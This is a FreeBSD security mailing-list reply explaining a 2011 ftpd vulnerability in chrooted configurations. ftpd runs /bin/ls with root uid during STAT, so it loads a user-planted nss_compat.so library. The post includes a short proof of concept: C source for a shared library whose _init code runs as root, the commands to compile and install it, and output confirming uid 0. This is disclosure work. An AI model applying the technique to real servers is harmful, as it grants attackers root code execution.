Re: ftpd security issue ?



Saw this on FD... Anyone know any more details about this ?
http://lists.grok.org.uk/pipermail/full-disclosure/2011-November/084372.html

This is a well known hazard of chrooting to directories controlled by
unprivileged users. In this case, vulnerability exists because ftpd calls
/bin/ls with uid=0 and euid!=0 when STAT command is issued, and nss_compat.so is
loaded by libc regardless of elevated privileges.

This can be proven by creating dummy ~/lib/nss_compat.so.1:

[venglin@lagoon ~/lib]$ cat dummy.c
#include <stdio.h>
#include <fcntl.h>

void _init() {
FILE *fp = fopen("asdf", "w+");
fprintf(fp, "%d %d\n", getuid(), geteuid());
}
[venglin@lagoon ~/lib]$ cc -o dummy.o -c dummy.c -fPIC
[venglin@lagoon ~/lib]$ cc -shared -Wl,-soname,dummy.so -o dummy.so dummy.o
-nostartfiles
[venglin@lagoon ~/lib]$ mv dummy.so nss_compat.so.1

And after calling STAT command:

[venglin@lagoon ~/lib]$ cat ~/asdf
0 3000

BTW. This vulnerability affects only configurations, where /etc/ftpchroot exists
or anonymous user is allowed to create files inside etc and lib dirs.

--
* Fido: 2:480/124 ** WWW: http://www.frasunek.com ** NICHDL: PMF9-RIPE *
* Jabber ID: venglin@xxxxxxxx ** PGP ID: 2578FCAD ** HAM-RADIO: SQ5JIV *
_______________________________________________
freebsd-security@xxxxxxxxxxx mailing list
http://lists.freebsd.org/mailman/listinfo/freebsd-security
To unsubscribe, send any mail to "freebsd-security-unsubscribe@xxxxxxxxxxx"